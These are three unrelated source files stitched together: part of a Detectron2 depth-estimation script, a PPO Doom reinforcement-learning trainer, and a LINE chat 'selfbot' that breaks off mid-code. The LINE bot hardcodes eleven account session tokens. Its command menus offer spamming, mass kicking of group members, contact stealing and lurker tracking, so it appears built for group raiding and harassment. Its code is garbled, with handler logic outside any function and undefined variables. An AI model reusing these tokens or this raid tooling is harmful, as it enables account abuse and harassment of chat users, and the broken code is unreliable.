FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)
self._verts3d = xs, ys, zs
def draw(self, renderer):
xs3d, ys3d, zs3d = self._verts3d
xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)
self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))
FancyArrowPatch.draw(self, renderer)
def find_mask_centre(mask, color_image):
"""
Finding centre of mask using moments
"""
moments = cv2.moments(np.float32(mask))
cX = int(moments["m10"] / moments["m00"])
cY = int(moments["m01"] / moments["m00"])
return cX, cY
def find_median_depth(mask_area, num_median, histg):
"""
Iterate through all histogram bins and stop at the median value. This is the
median depth of the mask.
"""
median_counter = 0
centre_depth = "0.00"
for x in range(0, len(histg)):
median_counter += histg[x][0]
if median_counter >= num_median:
# Half of histogram is iterated through,
# Therefore this bin contains the median
centre_depth = x / 50
break
return float(centre_depth)
def debug_plots(color_image, depth_image, mask, histg, depth_colormap):
"""
This function is used for debugging purposes. This plots the depth color-
map, mask, mask and depth color-map bitwise_and, and histogram distrobutions
of the full image and the masked image.
"""
full_hist = cv2.calcHist([depth_image], [0], None, [NUM_BINS], [0, MAX_RANGE])
masked_depth_image = cv2.bitwise_and(depth_colormap, depth_colormap, mask=mask)
plt.figure()
plt.subplot(2, 2, 1)
plt.imshow(depth_colormap)
plt.subplot(2, 2, 2)
plt.imshow(masks[i].mask)
plt.subplot(2, 2, 3).set_title(labels[i])
plt.imshow(masked_depth_image)
plt.subplot(2, 2, 4)
plt.plot(full_hist)
plt.plot(histg)
plt.xlim([0, 600])
plt.show()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--file', help='type --file=file-name.bag to stream using file instead of webcam')
args = parser.parse_args()
# Initialise Detectron2 predictor
predictor = Predictor()
# Initialise video streams from D435
video_streamer = VideoStreamer()
# Initialise Kalman filter tracker from modified Sort module
# mot_tracker = Sort()
depth_scale = video_streamer.get_depth_scale()
print("Depth Scale is: {:.4f}m".format(depth_scale))
speed_time_start = time.time()
video_streamer.start()
time.sleep(1)
while True:
time_start = time.time()
color_image, depth_image = video_streamer.read()
detected_objects = []
t1 = time.time()
camera_time = t1 - time_start
predictor.create_outputs(color_image)
outputs = predictor.outputs
t2 = time.time()
model_time = t2 - t1
print("Model took {:.2f} time".format(model_time))
predictions = outputs['instances']
if outputs['instances'].has('pred_masks'):
num_masks = len(predictions.pred_masks)
else:
# # Even if no masks are found, the trackers must still be updated
# tracked_objects = mot_tracker.update(boxes_list)
continue
detectron_time = time.time()
# Create a new Visualizer object from Detectron2
v = OptimizedVisualizer(color_image[:, :, ::-1], MetadataCatalog.get(predictor.config.DATASETS.TRAIN[0]))
masks, boxes, boxes_list, labels, scores_list, class_list = predictor.format_results(
v.metadata.get("thing_classes"))
for i in range(num_masks):
try:
detected_obj = DetectedObject(masks[i], boxes[i], labels[i], scores_list[i], class_list[i])
except:
print("Object doesn't meet all parameters")
detected_objects.append(detected_obj)
# tracked_objects = mot_tracker.update(boxes_list)
v.overlay_instances(
masks=masks,
boxes=boxes,
labels=labels,
keypoints=None,
assigned_colors=None,
alpha=0.3
)
speed_time_end = time.time()
total_speed_time = speed_time_end - speed_time_start
speed_time_start = time.time()
for i in range(num_masks):
"""
Converting depth image to a histogram with num bins of NUM_BINS
and depth range of (0 - MAX_RANGE millimeters)
"""
mask_area = detected_objects[i].mask.area()
num_median = math.floor(mask_area / 2)
histg = cv2.calcHist([depth_image], [0], detected_objects[i].mask.mask, [NUM_BINS], [0, MAX_RANGE])
# Uncomment this to use the debugging function
# depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)
# debug_plots(color_image, depth_image, masks[i].mask, histg, depth_colormap)
centre_depth = find_median_depth(mask_area, num_median, histg)
detected_objects[i].distance = centre_depth
cX, cY = find_mask_centre(detected_objects[i].mask._mask, v.output)
v.draw_circle((cX, cY), (0, 0, 0))
v.draw_text("{:.2f}m".format(centre_depth), (cX, cY + 20))
# for i in detected_objects:
# print(i)
# depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)
# cv2.imshow('Segmented Image', color_image)
cv2.imshow('Segmented Image', v.output.get_image()[:, :, ::-1])
# cv2.imshow('Depth', depth_colormap)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
time_end = time.time()
total_time = time_end - time_start
print("Time to process frame: {:.2f}".format(total_time))
print("FPS: {:.2f}\n".format(1 / total_time))
video_streamer.stop()
cv2.destroyAllWindows() |
init_ppo.py | #!/usr/bin/env python3
import numpy as np
import tensorflow as tf
import threading, time
from threading import Thread, Lock
from wrappers.doom import Sandbox
from agent import AsynchronousAgent
from networks import actor_critic_ppo
from utils import load_config, log_feedback
# -----------------------------
physical_devices = tf.config.experimental.list_physical_devices("GPU")
tf.config.experimental.set_memory_growth(physical_devices[0], True)
print("GPU is", "available" if physical_devices else "NOT AVAILABLE")
print("Eager mode:", tf.executing_eagerly())
# -----------------------------
config = load_config('config.yml')['doom-a2c']
log_dir = "metrics/"
# -----------------------------
sandbox = Sandbox(config)
env, action_space = sandbox.build_env(config['env_name'])
actor, critic = actor_critic_ppo(config['input_shape'], config['window_length'], action_space, config['learning_rate'])
actor.summary()
agent = AsynchronousAgent(config, sandbox, env, action_space)
lock = Lock()
# -----------------------------
def execute():
timestamp, summary_writer = log_feedback(log_dir)
print("Job ID:", timestamp)
frame_count = 0
episode_count = 0
a_loss, c_loss = 0, 0
episode_reward_history = []
episode_reward = 0
eval_reward = config['min_max'][0]
min_reward = config['min_max'][0]
life = 0
max_life = 0
# -----------------------------
print("Training...")
terminal, state, info, image_memory = sandbox.async_reset(env)
prev_info = info
actions, states, rewards, predictions = [], [], [], []
while True:
action, prediction = agent.policy_act(state, actor)
state_next, reward, terminal, info = sandbox.async_step(env, action, prev_info, image_memory)
actions.append(sandbox.one_hot(env, action))
states.append(tf.expand_dims(state_next, 0))
rewards.append(reward)
predictions.append(prediction)
if terminal:
a_loss, c_loss = agent.learn_ppo(actor, critic, actions, states, rewards, predictions)
actions, states, rewards, predictions = [], [], [], []
episode_reward = 0
episode_count += 1
max_life = max(life, max_life)
life = 0
else:
episode_reward += reward
life += 1
prev_info = info
state = state_next
episode_reward_history.append(episode_reward)
if len(episode_reward_history) > 100:
del episode_reward_history[:1]
running_reward = np.mean(episode_reward_history)
if terminal:
print("Frame: {}, Episode: {}, Reward: {}, Actor Loss: {}, Critic Loss: {}, Max Life: {}".format(frame_count, episode_count, running_reward, a_loss, c_loss, max_life))
with summary_writer.as_default():
tf.summary.scalar('a_loss', a_loss, step=episode_count)
tf.summary.scalar('c_loss', c_loss, step=episode_count)
tf.summary.scalar('running_reward', running_reward, step=episode_count)
tf.summary.scalar('eval_reward', eval_reward, step=episode_count)
tf.summary.scalar('max_life', max_life, step=episode_count)
if terminal and running_reward > (min_reward + 1):
agent.save(actor, log_dir + timestamp)
eval_reward = agent.evaluate(actor, (log_dir + timestamp), episode_count)
min_reward = running_reward
if running_reward == config['min_max'][1]:
agent.save(actor, log_dir + timestamp)
print("Solved at episode {}!".format(episode_count))
break
frame_count += 1
env.close()
# -----------------------------
def async_train(n_threads):
env.close()
envs = [sandbox.build_env(config['env_name'])[0] for i in range(n_threads)]
threads = [threading.Thread(target=train_threading, daemon=True, args=(envs[i], i)) for i in range(n_threads)]
for t in threads:
time.sleep(2)
t.start()
for t in threads:
time.sleep(10)
t.join()
def train_threading(env, thread):
timestamp, summary_writer = log_feedback(log_dir)
print("Job ID:", timestamp)
frame_count = 0
episode_count = 0
a_loss, c_loss = 0, 0
episode_reward_history = []
episode_reward = 0
eval_reward = config['min_max'][0]
min_reward = config['min_max'][0]
life = 0
max_life = 0
lock = Lock()
# -----------------------------
print("Training...")
terminal, state, info, image_memory = sandbox.async_reset(env)
prev_info = info
actions, states, rewards, predictions = [], [], [], []
while True:
action, prediction = agent.policy_act(state, actor)
state_next, reward, terminal, info = sandbox.async_step(env, action, prev_info, image_memory)
actions.append(sandbox.one_hot(env, action))
states.append(tf.expand_dims(state_next, 0))
rewards.append(reward)
predictions.append(prediction)
if terminal:
lock.acquire()
a_loss, c_loss = agent.learn_ppo(actor, critic, actions, states, rewards, predictions)
lock.release()
actions, states, rewards, prediction = [], [], [], []
episode_reward = 0
episode_count += 1
max_life = max(life, max_life)
life = 0
else:
episode_reward += reward
life += 1
prev_info = info
state = state_next
episode_reward_history.append(episode_reward)
if len(episode_reward_history) > 100:
del episode_reward_history[:1]
running_reward = np.mean(episode_reward_history)
with lock:
if terminal:
print("Frame: {}, Episode: {}, Thread: {}, Reward: {}, Actor Loss: {}, Critic Loss: {}, Max Life: {}".format(frame_count, episode_count, thread, running_reward, a_loss, c_loss, max_life))
with summary_writer.as_default():
tf.summary.scalar('a_loss', a_loss, step=episode_count)
tf.summary.scalar('c_loss', c_loss, step=episode_count)
tf.summary.scalar('running_reward', running_reward, step=episode_count)
tf.summary.scalar('eval_reward', eval_reward, step=episode_count)
tf.summary.scalar('max_life', max_life, step=episode_count)
if terminal and running_reward > (min_reward + 1):
agent.save(actor, log_dir + timestamp)
min_reward = running_reward
if running_reward == config['min_max'][1]:
agent.save(actor, log_dir + timestamp)
print("Solved at episode {}!".format(episode_count))
break
frame_count += 1
env.close()
# -----------------------------
execute()
# async_train(n_threads=3)
|
t.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
cl = LINETCR.LINE()
cl.login(token="EqBtIvxxVKKpceAKP9b8./xAA3piZkDNk7C2fd2Ya.z+oFeZ51V5KS94eIgEdtL+AD730jKJ9J+yUHMd7fY=")
cl.loginResult()
ki = LINETCR.LINE()
ki.login(token="EqvZ9DLPuSjeWdQVh4P1.As0xdoubrMVK87aCEwiq.RdxMiEBVjdjX1Voo3HWYmlu+hunIoOME8VXq36HK4=")
ki.loginResult()
ki2 = LINETCR.LINE()
ki2.login(token="EqVxkQSILbZMXzdwUJu6./QTl046oneusnakwA1BlvG.bp+q0pOXUGpActC2hseQ7ita2kYBu2t8GhgT6IxKE=")
ki2.loginResult()
ki3 = LINETCR.LINE()
ki3.login(token="Eqi3nFU7AN1msVz21jy4.rPChBbvqv2dePvyacNqf9a.if68zXj7EpSeI99Adwd9Kjh+QxUlf3ByioF+1HqJc=")
ki3.loginResult()
ki4 = LINETCR.LINE()
ki4.login(token="Eq01swaekVy7bot8OIb0.ALeoPWu5rBLgzDeTaBkyma.kNxeK5NmYzAhuPxBjuXR4xrLB5RtvcIjcssHvScsk=")
ki4.loginResult()
ki5 = LINETCR.LINE()
ki5.login(token="Eq8myQ5qiRXudJN6kJca.B1iRtmw7Z7j0en+FoJLJ2G.dbkRKNrcdTptrQhrO95CzLhHBK7Jk+lVmwjLh35ig=")
ki5.loginResult()
ki6 = LINETCR.LINE()
ki6.login(token="EqVGVRhWAZMAjq7rDwra.B8U5BeLQR0weg1uivR72sG.1/i20+5R9yP2OYrYEBG8wGmrSGlt9DF7KTtm0Y4MA=")
ki6.loginResult()
ki7 = LINETCR.LINE()
ki7.login(token="EqfBCvF8SnPPzdY7eEk4.pUox2JbsCqz2R9I6aLvtLa.o6fLrarPrrp+iwN/43h8zERugbu0wd+oesOb3AchY=")
ki7.loginResult()
ki8 = LINETCR.LINE()
ki8.login(token="Eqsb1uEpPDEGNyPOw0J0.dvkllQAMvSv/TKq0R9lJKa.3a96tHtTmhj/endngz8mSTFMQY2XQPBhIupKQbKpI=")
ki8.loginResult()
ki9 = LINETCR.LINE()
ki9.login(token="EqEw4MaEpSRBS6yXT3t5.NiWilBa0jddRHKn+YZanTq.FOwq8ou7rp302aejCT5aGKzrDMo69uMry57gB3Kh0=")
ki9.loginResult()
ki10 = LINETCR.LINE()
ki10.login(token="Eq0J2ShcJs0AL6oYFHt5.4zF+n3EzW08xwO3fALhIvq.HUjv1MErvKSf4JsS/ULBY27bASBwNEnDM5QyyEIeM=")
ki10.loginResult()
print u"Login Success CyberTK"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""╔══════════════════════
║ ™☆☞General Command☜☆™
╠═══☆☞H E L P☜☆═════════
╠🌟『Owner』
╠🌟『Pap owner』
╠🌟『Speed』
╠🌟『Speed test』
╠🌟『Status』
╠═══☆☞S E L F☜☆═════════
╠✨『Hi』
╠✨『Me』
╠✨『Mymid』
╠✨『Mid @』
╠✨『SearchID ID LINE)』
╠✨『Checkdate DD/MM/YY』
╠✨『Kalender』
╠✨『Steal contact』
╠✨『Getpict @』
╠✨『Getcover @』
╠✨『Auto like』
╠✨『System』
╠✨『Kernel』
╠✨『Cpu』
╠✨『Bio @』
╠✨『Info @』
╠✨『Name @』
╠✨『Profile @』
╠✨『Contact @』
╠✨『Comment on/off』
╠✨『Friendlist』
╠✨『Kicker on/off』
╠✨『Repdel @』
╠✨『Miclist』
╠═══☆☞ B O T ☜☆═════════
╠🚨『Absen』
╠🚨『Respon』
╠🚨『Runtime』
╠🚨『copy @』
╠🚨『Copycontact』
╠🚨『Mybackup』
╠🚨『Mybio Text』
╠🚨『Myname Text』
╠🚨『@bye』
╠🚨『Bot on/off』
╠═══☆☞ M E D I A ☜☆═══════
╠💻『Gift』
╠💻『Giftbycontact』
╠💻『Gif gore』
╠💻『Google (Text)』
╠💻『Playstore NamaApp』
╠💻『Fancytext Text』
╠💻『musik Judul-Penyanyi』
╠💻『lirik Judul-Penyanyi』
╠💻『musrik Judul-Penyanyi』
╠💻『ig UrsnameInstagram』
╠💻『Checkig UrsnameIG』
╠💻『apakah Text 』
╠💻『kapan Text 』
╠💻『hari Text 』
╠💻『berapa Text 』
╠💻『berapakah Text』
╠💻『Youtube Judul Video』
╠💻『Youtubevideo Judul Video』
╠💻『Youtubesearch: Judul Video』
╠💻『Image NamaGambar』
╠💻『Say Text』
╠💻『Say-en Text』
╠💻『Say-jp Text』
╠💻『Tr-id Text En Ke ID』
╠💻『Tr-en Text ID Ke En』
╠💻『Tr-th Text ID Ke Th』
╠💻『Id@en Text ID Ke En』
╠💻『Id@th Text ID Ke TH』
╠💻『En@id Text En Ke ID』
╠═══☆☞ G R O U P ☜☆═══════
╠🌀『Welcome』
╠🌀『Say welcome』
╠🌀『Invite creator』
╠🌀『Setview/Cctv』
╠🌀『Viewseen/Ciduk』
╠🌀『Gn: (NamaGroup)』
╠🌀『Tag all/Croot』
╠🌀『lurk on/off』
╠🌀『lurkers』
╠🌀『Recover』
╠🌀『Cancel』
╠🌀『Cancelall』
╠🌀『Gcreator』
╠🌀『Ginfo』
╠🌀『Gurl』
╠🌀『List group』
╠🌀『Pict group: NamaGroup』
╠🌀『Spam-5: Text』
╠🌀『Nspam: Text』
╠🌀『GhostSpam: Text』
╠🌀『Add all』
╠🌀『Kick: Mid』
╠🌀『Invite: Mid』
╠🌀『Bot:inv』
╠🌀『Memlist』
╠🌀『Getgroup image』
╠🌀『Urlgroup Image』
╠═══☆☞S E T ☜☆══════════
╠🔏『Notif on/off』
╠🔏『Protect on/off』
╠🔏『Invitepro on/off』
╠🔏『Alwaysread on/off』
╠🔏『Sider on/off』
╠🔏『Auto like』
╠🔏『Invitepro on/off』
╠🔏『Auto add on/off』
╠🔏『Auto leave on/off』
╠🔏『Auto join on/off』
╠🔏『Join cancel on/off』
╠🔏『Auto kick on/off』
╠🔏『Kicker on/off』
╠🔏『Comment on/off』
╠🔏『Share on/off』
╠🔏『Contact on/off』
╠🔏『Sticker on』
╠🔏『Qrprotect on/off』
╠═══☆☞C R E A T O R ☜☆═════
╠🎬『Blank』
╠🎬『Kickall/1997』
╠🎬『Bc: Text』
╠🎬『Join group: (NamaGroup』
╠🎬『Leave group: (NamaGroup』
╠🎬『Leave all group』
╠🎬『Tag on/off』
╠🎬『Bot restart/Reboot』
╠🎬『Turn off』
╠══════════════════════
║♻ Creating by:®R̸y̸a̸̸n̸ R̸̸a̸s̸̸y̸i̸̸d̸ ♻
║®Support by :
║☆☞ Silent Kill™『SK』
║☆☞ Ninja Jawa Killer™『NJK』
╚══════════════════════"""
ryanMessage ="""╔══════════════════════
║ ™☆☞R̸y̸a̸n̸ R̸a̸s̸yi̸d̸☜☆™
╠══════════════════════
╠🔒『Allprotect on/off』
╠🔒『Ban』
╠🔒『Unban』
╠🔒『Ban @』
╠🔒『Unban @』
╠🔒『Ban list』
╠🔒『Invite』
╠🔒『Clear ban』
╠🔒『Kill』
╠🔒『Kick @』
╠🔒『Set member: Jumlah』
╠🔒『Ban group: NamaGroup』
╠🔒『Del ban: NamaGroup』
╠🔒『List ban』
╠🔒『Kill ban』
╠🔒『Com set: text』
╠🔒『Pesan add- text』
╠🔒『Message set: text』
╠🔒『Message set text』
╠🔒『Help set: text』
╠🔒『Glist』
╠🔒『Glistmid』
╠🔒『Details group: Gid』
╠🔒『Cancel invite: Gid』
╠🔒『InviteMeTo: Gid』
╠🔒『Acc invite』
╠🔒『Removechat』
╠🔒『Qr on/off』
╠🔒『Autokick on/off』
╠🔒『Autocancel on/off』
╠🔒『Invitepro on/off』
╠🔒『Join on/off』
╠🔒『Joincancel on/off』
╠🔒『Respon1 on/off』
╠🔒『Respon2 on/off』
╠🔒『Respon3 on/off』
╠🔒『Respon4 on/off』
╠🔒『Responkick on/off』
╠══════════════════════
║♻ Creating by:®R̸y̸a̸̸n̸ R̸̸a̸s̸̸y̸i̸̸d̸ ♻
║®Support by :
║☆☞ Silent Kill™『SK』
║☆☞ Ninja Jawa Killer™『NJK』
╚══════════════════════"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5,ki6,ki7,ki8,ki9,ki10]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
ki6mid = ki6.getProfile().mid
ki7mid = ki7.getProfile().mid
ki8mid = ki8.getProfile().mid
ki9mid = ki9.getProfile().mid
ki10mid = ki10.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid,ki6mid,ki7mid,ki8mid,ki9mid,ki10mid]
admsa = 'uf9769adcf23329d9caedcd850f6caea8'
admin = 'uf9769adcf23329d9caedcd850f6caea8'
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":False,"members":10},
'leaveRoom':True,
'timeline':True,
'pap':{},
'likeOn':{},
'invite':{},
'winvite':{},
'copy':{},
'sticker':False,
'detectMention':False,
'detectMention2':False,
'detectMention3':False,
'detectMention4':True,
'kickMention':False,
'autoAdd':True,
'message':"Thanks For Add Me\n┅͜͡૨γαղ┅͜͡\n\n♻Support By ~ ҳ̸Ҳ̸ҳ Сўв∝я тҝ ҳ̸Ҳ̸ҳ\n\n✯==== Creator ====✯\n\nhttp://line.me/ti/p/~s.k.9.7",
"lang":"JP",
"Timeline":True,
"comment":"☆Auto Like ©By : R̶y̶an Pr̶o̶tect\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment1":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ1\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment2":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ2\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment3":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ3\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment4":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ4\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment5":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ5\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment6":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ6\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment7":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ7\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment8":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ8\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment9":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ9\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"comment10":"☆Auto Like ©By : Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ10\n╔═════════════════════\n╠♻Support by :\n╠☆☞ Silent Kill™『SK』\n╠☆☞ NJ Killer™『NJK』\n╠═════════════════════\n╠☆☞ http://line.me/ti/p/~s.k.9.7\n╚═════════════════════",
"commentOn":True,
"commentBlack":{},
"Sambutan":False,
"wblack":False,
"dblack":False,
"joinkick":{},
"AutoJoinCancel":True,
"AutoKick":{},
"Members":{},
"AutoKickon":False,
"clock":False,
"cNames":"",
"cNames":"",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"alwaysRead":False,
"Mimic":{},
"Sider":{},
"Simi":{},
"linkprotect":False,
}
settings = {
"simiSimi":{}
}
mode='self'
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
mulai = time.time()
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup1 = ki.getProfile()
backup1.displayName = contact.displayName
backup1.statusMessage = contact.statusMessage
backup1.pictureStatus = contact.pictureStatus
contact = ki2.getProfile()
backup2 = ki2.getProfile()
backup2.displayName = contact.displayName
backup2.statusMessage = contact.statusMessage
backup2.pictureStatus = contact.pictureStatus
contact = ki3.getProfile()
backup3 = ki3.getProfile()
backup3.displayName = contact.displayName
backup3.statusMessage = contact.statusMessage
backup3.pictureStatus = contact.pictureStatus
contact = ki4.getProfile()
backup4 = ki4.getProfile()
backup4.displayName = contact.displayName
backup4.statusMessage = contact.statusMessage
backup4.pictureStatus = contact.pictureStatus
contact = ki5.getProfile()
backup5 = ki5.getProfile()
backup5.displayName = contact.displayName
backup5.statusMessage = contact.statusMessage
backup5.pictureStatus = contact.pictureStatus
contact = ki6.getProfile()
backup6 = ki6.getProfile()
backup6.displayName = contact.displayName
backup6.statusMessage = contact.statusMessage
backup6.pictureStatus = contact.pictureStatus
contact = ki7.getProfile()
backup7 = ki7.getProfile()
backup7.displayName = contact.displayName
backup7.statusMessage = contact.statusMessage
backup7.pictureStatus = contact.pictureStatus
contact = ki8.getProfile()
backup8 = ki8.getProfile()
backup8.displayName = contact.displayName
backup8.statusMessage = contact.statusMessage
backup8.pictureStatus = contact.pictureStatus
contact = ki9.getProfile()
backup9 = ki9.getProfile()
backup9.displayName = contact.displayName
backup9.statusMessage = contact.statusMessage
backup9.pictureStatus = contact.pictureStatus
contact = ki10.getProfile()
backup10 = ki10.getProfile()
backup10.displayName = contact.displayName
backup10.statusMessage = contact.statusMessage
backup10.pictureStatus = contact.pictureStatus
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d Jam %02d Menit %02d Detik' % (hours, mins, secs)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
Name = summon(op.param2)
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
cl.sendText(op.param1, "Haii " + "☞ " + Name + " ☜" + "\nNgintip Aja Niih. . .\nChat Kek Idiih (-__-) ")
time.sleep(0.2)
summon(op.param1,[op.param2])
else:
cl.sendText(op.param1, "Haii " + "☞ " + Name + " ☜" + "\nBetah Banget Jadi Penonton. . .\nChat Napa (-__-) ")
time.sleep(0.2)
summon(op.param1,[op.param2])
else:
cl.sendText(op.param1, "Haii " + "☞ " + Name + " ☜" + "\nNgapain Kak Ngintip Aja???\nSini Gabung Chat... ")
time.sleep(0.2)
summon(op.param1,[op.param2])
else:
pass
else:
pass
except:
pass
else:
pass
if mid in op.param3:
if wait["AutoJoinCancel"] == True:
G = cl.getGroup(op.param1)
if len(G.members) <= wait["memberscancel"]:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1,"Maaf " + cl.getContact(op.param2).displayName + "\nMember Kurang Dari 30 Orang\nUntuk Info, Silahkan Chat Owner Kami!")
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
cl.sendText(op.param1,"☆『Assalamu'alaikum』☆\n☆『Newbie Om, Jangan Dibully』☆")
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def bot(op):
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
ki.rejectGroupInvitation(op.param1)
ki2.rejectGroupInvitation(op.param1)
ki3.rejectGroupInvitation(op.param1)
ki4.rejectGroupInvitation(op.param1)
ki4.rejectGroupInvitation(op.param1)
ki6.rejectGroupInvitation(op.param1)
ki7.rejectGroupInvitation(op.param1)
ki8.rejectGroupInvitation(op.param1)
ki9.rejectGroupInvitation(op.param1)
ki10.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
ki2.acceptGroupInvitation(op.param1)
ki3.acceptGroupInvitation(op.param1)
ki4.acceptGroupInvitation(op.param1)
ki5.acceptGroupInvitation(op.param1)
ki6.acceptGroupInvitation(op.param1)
ki7.acceptGroupInvitation(op.param1)
ki8.acceptGroupInvitation(op.param1)
ki9.acceptGroupInvitation(op.param1)
ki10.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ki.acceptGroupInvitation(op.param1)
ki2.acceptGroupInvitation(op.param1)
ki3.acceptGroupInvitation(op.param1)
ki4.acceptGroupInvitation(op.param1)
ki5.acceptGroupInvitation(op.param1)
ki6.acceptGroupInvitation(op.param1)
ki7.acceptGroupInvitation(op.param1)
ki8.acceptGroupInvitation(op.param1)
ki9.acceptGroupInvitation(op.param1)
ki10.acceptGroupInvitation(op.param1)
if msg.contentType == 16:
if wait['likeOn'] == True:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1005)
ki.like(url[25:58], url[66:], likeType=1002)
ki2.like(url[25:58], url[66:], likeType=1004)
ki3.like(url[25:58], url[66:], likeType=1003)
ki4.like(url[25:58], url[66:], likeType=1001)
cl.comment(url[25:58], url[66:], wait["comment"])
ki.comment(url[25:58], url[66:], wait["comment"])
ki2.comment(url[25:58], url[66:], wait["comment"])
ki3.comment(url[25:58], url[66:], wait["comment"])
ki4.comment(url[25:58], url[66:], wait["comment"])
cl.sendText(msg.to,"Like Success")
wait['likeOn'] = True
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
